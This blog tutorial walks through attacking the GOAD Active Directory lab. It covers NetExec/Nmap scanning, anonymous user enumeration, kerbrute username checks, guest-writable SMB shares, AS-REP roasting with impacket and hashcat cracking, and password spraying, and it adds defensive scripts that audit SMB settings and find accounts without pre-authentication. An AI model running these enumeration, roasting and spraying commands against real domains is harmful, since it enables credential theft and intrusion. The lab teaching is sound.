The previous article was a bit disorganised. Since this is a blog, it should be a tutorial that covers every detail, so in this post I will describe, from the angle of teaching domain penetration testing, how to work through GOAD step by step.

Scanning and reconnaissance

Network scanning

Quick probing with NetExec

In a domain penetration test we can use NetExec for a quick sweep of the Windows hosts on the network:

nxc smb 192.168.56.0/24

[image: nxc_scan]

From the output we can see that there are three domains:

essos.local
sevenkingdoms.local
north.sevenkingdoms.local

Because these three hosts show signing:True (domain controllers require SMB signing by default), we can guess they are the domain controllers. To confirm, scan the LDAP port:

nxc ldap 192.168.56.0/24

[image: nxc_ldap_scan]

This confirms that there are three domain controllers.

Configuring hosts

We need to set up the hosts file on our local machine so that Kerberos, which relies on host names, can be used later:

# /etc/hosts
# GOAD
192.168.56.10 sevenkingdoms.local kingslanding.sevenkingdoms.local kingslanding
192.168.56.11 winterfell.north.sevenkingdoms.local north.sevenkingdoms.local winterfell
192.168.56.12 essos.local meereen.essos.local meereen
192.168.56.22 castelblack.north.sevenkingdoms.local castelblack
192.168.56.23 braavos.essos.local braavos

Full port scan with Nmap

To widen the attack surface, we run a full port scan against the hosts discovered so far:

nmap -Pn -p- -sC -sV -oA full_scan 192.168.56.10-12,22-23

Explanation of the parameters:

-Pn do not use ping for host discovery (treat every target as up)

-p- scan all 65535 ports

-sC run the default reconnaissance scripts

-sV probe service versions

-oA save the results in all three output formats under the name full_scan

The scan output is too long to show here.

Analysing the scan results

Searching Google for sevenkingdoms.local and essos.local, we can tell that these domains are themed on Game of Thrones / A Song of Ice and Fire. Although this is a lab, the same OSINT and social-engineering skill applies in real engagements, where domain and host names often leak the naming conventions in use.


Finding domain users

Enumerate domain accounts anonymously on the domain controllers:

nxc smb 192.168.56.0/24 --users

[image: Enumerate]

On WINTERFELL.NORTH.SEVENKINGDOMS.LOCAL we enumerated ten domain accounts and, as an unexpected bonus, found a password stored in a user's description field:

samwell.tarly:Heartsbane

These account names also validate the OSINT from the previous step: we were looking for the right information.


Once we have a password, we can use ldapdomaindump to pull the domain information:

┌──(kali㉿kali)-[~]
└─$ ldapdomaindump -u 'NORTH.SEVENKINGDOMS.LOCAL\samwell.tarly' -p Heartsbane -o NORTH.SEVENKINGDOMS.LOCAL 192.168.56.11
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished

We now have every account on NORTH.SEVENKINGDOMS.LOCAL.

OSINT + brute-force account enumeration

We take the names gathered through OSINT while analysing the scan results above and write them in the same username format we saw in the other domain, firstname.lastname (this format is common in most domains).

A simple shell script can scrape the relevant character names from the web:

#!/bin/bash

# Fetch the cast page and extract "Firstname Lastname" strings that sit between tags
curl -s "https://www.hbomax.com/shows/game-of-thrones/4f6b4985-2dc9-4ab6-ac79-d60f0860b0ac/cast-and-crew" | \
grep -o '>[A-Z][a-z]* [A-Z][a-z]*<' | \
sed 's/>//g; s/<//g' | \
awk '
BEGIN { count = 0 }
{
    count++
    # Skip the first 11 matches, then keep every second match (offsets are specific to this page layout)
    if (count > 11 && (count - 12) % 2 == 0) {
        # Convert to lowercase and replace spaces with dots: firstname.lastname
        name = tolower($0)
        gsub(/ /, ".", name)
        print name
    }
}' | \
sort | uniq

We can then use kerbrute to check which of these usernames exist in the domain:

┌──(kali㉿kali)-[~]
└─$ kerbrute userenum -d essos.local --dc 192.168.56.12 got_users.txt

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 12/21/25 - Ronnie Flathers @ropnop

2025/12/21 06:32:31 > Using KDC(s):
2025/12/21 06:32:31 > 192.168.56.12:88

2025/12/21 06:32:31 > [+] VALID USERNAME: [email protected]
2025/12/21 06:32:31 > [+] VALID USERNAME: [email protected]
2025/12/21 06:32:31 > [+] VALID USERNAME: [email protected]
2025/12/21 06:32:31 > [+] VALID USERNAME: [email protected]
2025/12/21 06:32:36 > Done! Tested 80 usernames (4 valid) in 5.003 seconds

Nmap can do the same enumeration; let's try it against the other domain:

┌──(kali㉿kali)-[~]
└─$ nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='sevenkingdoms.local',userdb=got_users.txt" 192.168.56.10
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-21 06:32 EST
Nmap scan report for sevenkingdoms.local (192.168.56.10)
Host is up (0.00035s latency).

PORT   STATE SERVICE
88/tcp open  kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
|     [email protected]
|_    [email protected]
MAC Address: 00:0C:29:CC:C8:38 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds

Looking for SMB shares accessible without credentials

┌──(kali㉿kali)-[~]
└─$ nxc smb 192.168.56.0/24 -u 'a' -p '' --shares
SMB 192.168.56.10 445 KINGSLANDING [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.12 445 MEEREEN [*] Windows 10 / Server 2016 Build 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True)
SMB 192.168.56.22 445 CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)
SMB 192.168.56.10 445 KINGSLANDING [-] sevenkingdoms.local\a: STATUS_LOGON_FAILURE
SMB 192.168.56.11 445 WINTERFELL [-] north.sevenkingdoms.local\a: STATUS_LOGON_FAILURE
SMB 192.168.56.23 445 BRAAVOS [*] Windows 10 / Server 2016 Build 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
SMB 192.168.56.12 445 MEEREEN [-] essos.local\a: STATUS_LOGON_FAILURE
SMB 192.168.56.22 445 CASTELBLACK [-] north.sevenkingdoms.local\a: STATUS_LOGON_FAILURE
SMB 192.168.56.23 445 BRAAVOS [+] essos.local\a: (Guest)
SMB 192.168.56.23 445 BRAAVOS [*] Enumerated shares
SMB 192.168.56.23 445 BRAAVOS Share Permissions Remark
SMB 192.168.56.23 445 BRAAVOS ----- ----------- ------
SMB 192.168.56.23 445 BRAAVOS ADMIN$ Remote Admin
SMB 192.168.56.23 445 BRAAVOS all READ,WRITE Basic RW share for all
SMB 192.168.56.23 445 BRAAVOS C$ Default share
SMB 192.168.56.23 445 BRAAVOS CertEnroll Active Directory Certificate Services share
SMB 192.168.56.23 445 BRAAVOS IPC$ READ Remote IPC
SMB 192.168.56.23 445 BRAAVOS public Basic Read share for all domain users
Running nxc against 256 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

BRAAVOS accepts a guest logon, and one share ("all") is both readable and writable.
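From the defender's side the same nxc output is an audit source: a host that does not require SMB signing is exposed to NTLM relay, SMBv1 should be off, and a guest session that can write to a share is a finding on its own. The Python below is an added example (not from the original post or from the NetExec project). It parses nxc-style lines constructed after the output above (the regular expressions assume that exact line layout) and reports those three conditions per host.

```python
import re

# Constructed sample lines, modelled on the nxc smb --shares output shown above.
SAMPLE_NXC_OUTPUT = """\
SMB 192.168.56.10 445 KINGSLANDING [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.12 445 MEEREEN [*] Windows 10 / Server 2016 Build 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True)
SMB 192.168.56.22 445 CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)
SMB 192.168.56.23 445 BRAAVOS [*] Windows 10 / Server 2016 Build 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
SMB 192.168.56.10 445 KINGSLANDING [-] sevenkingdoms.local\\a: STATUS_LOGON_FAILURE
SMB 192.168.56.23 445 BRAAVOS [+] essos.local\\a: (Guest)
SMB 192.168.56.23 445 BRAAVOS [*] Enumerated shares
SMB 192.168.56.23 445 BRAAVOS Share Permissions Remark
SMB 192.168.56.23 445 BRAAVOS ----- ----------- ------
SMB 192.168.56.23 445 BRAAVOS ADMIN$ Remote Admin
SMB 192.168.56.23 445 BRAAVOS all READ,WRITE Basic RW share for all
SMB 192.168.56.23 445 BRAAVOS C$ Default share
SMB 192.168.56.23 445 BRAAVOS IPC$ READ Remote IPC
SMB 192.168.56.23 445 BRAAVOS public Basic Read share for all domain users
"""

# Host banner line: captures IP, NetBIOS name, signing and SMBv1 flags.
HOST_RE = re.compile(
    r"^SMB (\S+) \d+ (\S+) \[\*\] .*\(signing:(True|False)\) \(SMBv1:(True|False)\)"
)
# Successful logon that fell back to the Guest account.
GUEST_RE = re.compile(r"^SMB (\S+) \d+ \S+ \[\+\] \S+: \(Guest\)")
# Share table row that carries a permission column (rows without access have none).
SHARE_RE = re.compile(r"^SMB (\S+) \d+ \S+ (\S+) (READ(?:,WRITE)?|WRITE) (.*)$")


def audit_nxc_smb(output: str) -> dict:
    """Return {ip: {"name", "issues", "guest_writable"}} for the nxc lines given."""
    findings: dict = {}
    guest_hosts: set = set()
    for line in output.splitlines():
        m = HOST_RE.match(line)
        if m:
            ip, name, signing, smbv1 = m.groups()
            entry = findings.setdefault(ip, {"name": name, "issues": [], "guest_writable": []})
            if signing == "False":
                entry["issues"].append("SMB signing not required (relay risk)")
            if smbv1 == "True":
                entry["issues"].append("SMBv1 enabled")
            continue
        m = GUEST_RE.match(line)
        if m:
            ip = m.group(1)
            guest_hosts.add(ip)
            entry = findings.setdefault(ip, {"name": "?", "issues": [], "guest_writable": []})
            entry["issues"].append("guest/anonymous logon accepted")
            continue
        m = SHARE_RE.match(line)
        # Share rows only follow a successful session, so attribute them to guest hosts.
        if m and m.group(1) in guest_hosts:
            ip, share, perms, _remark = m.groups()
            if "WRITE" in perms:
                findings[ip]["guest_writable"].append(share)
    return findings


if __name__ == "__main__":
    for ip, f in audit_nxc_smb(SAMPLE_NXC_OUTPUT).items():
        if f["issues"] or f["guest_writable"]:
            print(ip, f["name"], f["issues"], "guest-writable:", f["guest_writable"])
```

Feeding real nxc output to the script (for example via nxc's own log file) gives a quick list of hosts to fix: enforce SMB signing through Group Policy, remove the SMBv1 feature, and disable the Guest account or tighten the share ACL.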

When we have usernames but no passwords

AS-REP roasting

Take, for example, all the usernames we retrieved earlier from north.sevenkingdoms.local with ldapdomaindump:

sql_svc
jeor.mormont
samwell.tarly
jon.snow
hodor
rickon.stark
brandon.stark
sansa.stark
robb.stark
catelyn.stark
eddard.stark
arya.stark
krbtgt
vagrant
Guest
Administrator

Save them to users.txt and ask the KDC for an AS-REP for each one without pre-authentication:

┌──(kali㉿kali)-[~]
└─$ impacket-GetNPUsers north.sevenkingdoms.local/ -no-pass -usersfile users.txt
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[-] User sql_svc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User jeor.mormont doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User samwell.tarly doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User jon.snow doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User hodor doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User rickon.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[email protected]:c0d425fe45c54c3c18e875898bca120f$…
[-] User sansa.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User robb.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User catelyn.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User eddard.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User arya.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User vagrant doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set

This gives us brandon.stark's AS-REP hash (the encrypted part of his ticket reply). Next we crack it with hashcat (mode 18200, Kerberos 5 AS-REP etype 23):

┌──(kali㉿kali)-[~]
└─$ hashcat -m 18200 asrephash.txt /usr/share/wordlists/rockyou.txt
hashcat (v7.1.2) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #01: cpu-haswell-13th Gen Intel(R) Core(TM) i9-13900H, 6956/13913 MB (2048 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimum salt length supported by kernel: 0
Maximum salt length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory allocated for this attack: 513 MB (11083 MB free)

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

[email protected]:c0d425fe45c54c3c18e875898bca120f$…:iseedeadpeople

So brandon.stark's password is iseedeadpeople.
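GetNPUsers succeeded only for brandon.stark because his account has the DONT_REQUIRE_PREAUTH bit (0x400000) set in userAccountControl; krbtgt and Guest answered KDC_ERR_CLIENT_REVOKED because they are disabled, and a disabled account cannot be roasted even with that bit set. The Python below is an added example (not from the original post or from Impacket or ldapdomaindump). It builds the LDAP filter a defender can run to find enabled accounts with that bit, and classifies a constructed list of (sAMAccountName, userAccountControl) pairs the way a ldapdomaindump user export could be post-processed; the userAccountControl values are assumed for illustration, not taken from the lab.

```python
# userAccountControl bits as documented by Microsoft for Active Directory.
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_DONT_REQUIRE_PREAUTH = 0x400000

# OID of the LDAP_MATCHING_RULE_BIT_AND extensible match rule.
BIT_AND_RULE = "1.2.840.113556.1.4.803"

# Constructed sample (sAMAccountName, userAccountControl); the flag values are
# assumed for illustration and are not the lab's real attribute values.
SAMPLE_ACCOUNTS = [
    ("brandon.stark", UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH),
    ("jon.snow", UF_NORMAL_ACCOUNT),
    ("krbtgt", UF_NORMAL_ACCOUNT | UF_ACCOUNTDISABLE),
    ("Guest", UF_NORMAL_ACCOUNT | UF_ACCOUNTDISABLE | UF_DONT_EXPIRE_PASSWD),
    ("sql_svc", UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD),
]


def ldap_bit_and(attribute: str, bit: int) -> str:
    """Build an LDAP clause that is true when `bit` is set in `attribute`."""
    return f"({attribute}:{BIT_AND_RULE}:={bit})"


def roastable_filter() -> str:
    """LDAP filter for enabled accounts that do not require Kerberos pre-authentication."""
    wants_no_preauth = ldap_bit_and("userAccountControl", UF_DONT_REQUIRE_PREAUTH)
    disabled = ldap_bit_and("userAccountControl", UF_ACCOUNTDISABLE)
    return f"(&{wants_no_preauth}(!{disabled}))"


def classify_preauth(accounts):
    """Split accounts into (roastable, disabled, normal) by their userAccountControl.

    A disabled account is reported separately even if DONT_REQUIRE_PREAUTH is set:
    the KDC answers it with KDC_ERR_CLIENT_REVOKED, not with an AS-REP.
    """
    roastable, disabled, normal = [], [], []
    for sam, uac in accounts:
        if uac & UF_ACCOUNTDISABLE:
            disabled.append(sam)
        elif uac & UF_DONT_REQUIRE_PREAUTH:
            roastable.append(sam)
        else:
            normal.append(sam)
    return roastable, disabled, normal


if __name__ == "__main__":
    print("LDAP filter:", roastable_filter())
    r, d, n = classify_preauth(SAMPLE_ACCOUNTS)
    print("roastable:", r)
    print("disabled:", d)
    print("normal:", n)
```

The filter string can be pasted into any LDAP client (ldapsearch, PowerShell Get-ADObject -LDAPFilter) as a periodic control; the remediation is to clear "Do not require Kerberos preauthentication" on every hit, and where an application genuinely needs it, to give that account a long random password so an offline crack like the one above does not succeed.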

Password spraying

The first case is accounts whose password equals the username (very rare in real environments). The --no-bruteforce flag pairs each username with the password on the same line instead of trying every combination:

┌──(kali㉿kali)-[~]
└─$ nxc smb 192.168.56.11 -u users.txt -p users.txt --no-bruteforce
SMB 192.168.56.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.11 445 WINTERFELL [-] north.sevenkingdoms.local\sql_svc:sql_svc STATUS_LOGON_FAILURE
SMB 192.168.56.11 445 WINTERFELL [-] north.sevenkingdoms.local\jeor.mormont:jeor.mormont STATUS_LOGON_FAILURE
SMB 192.168.56.11 445 WINTERFELL [-] north.sevenkingdoms.local\samwell.tarly:samwell.tarly STATUS_LOGON_FAILURE
SMB 192.168.56.11 445 WINTERFELL [-] north.sevenkingdoms.local\jon.snow:jon.snow STATUS_LOGON_FAILURE
SMB 192.168.56.11 445 WINTERFELL [+] north.sevenkingdoms.local\hodor:hodor

The second case is password reuse across accounts: one known password is tried against every user. kerbrute does this over Kerberos and is very fast:

┌──(kali㉿kali)-[~]
└─$ kerbrute passwordspray -d north.sevenkingdoms.local --dc 192.168.56.11 users.txt hodor

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 12/21/25 - Ronnie Flathers @ropnop

2025/12/21 06:56:44 > Using KDC(s):
2025/12/21 06:56:44 > 192.168.56.11:88

2025/12/21 06:56:44 > [+] VALID LOGIN: [email protected]:hodor
2025/12/21 06:56:44 > Done! Tested 16 logins (1 successes) in 0.019 seconds

Summary

Over the course of this walkthrough we obtained three account passwords in total.

They are:

samwell.tarly:Heartsbane (user description field)
brandon.stark:iseedeadpeople (AS-REP roasting)
hodor:hodor (password spraying)

This post draws heavily on Mayfly's work; if you found it useful, go and read the original.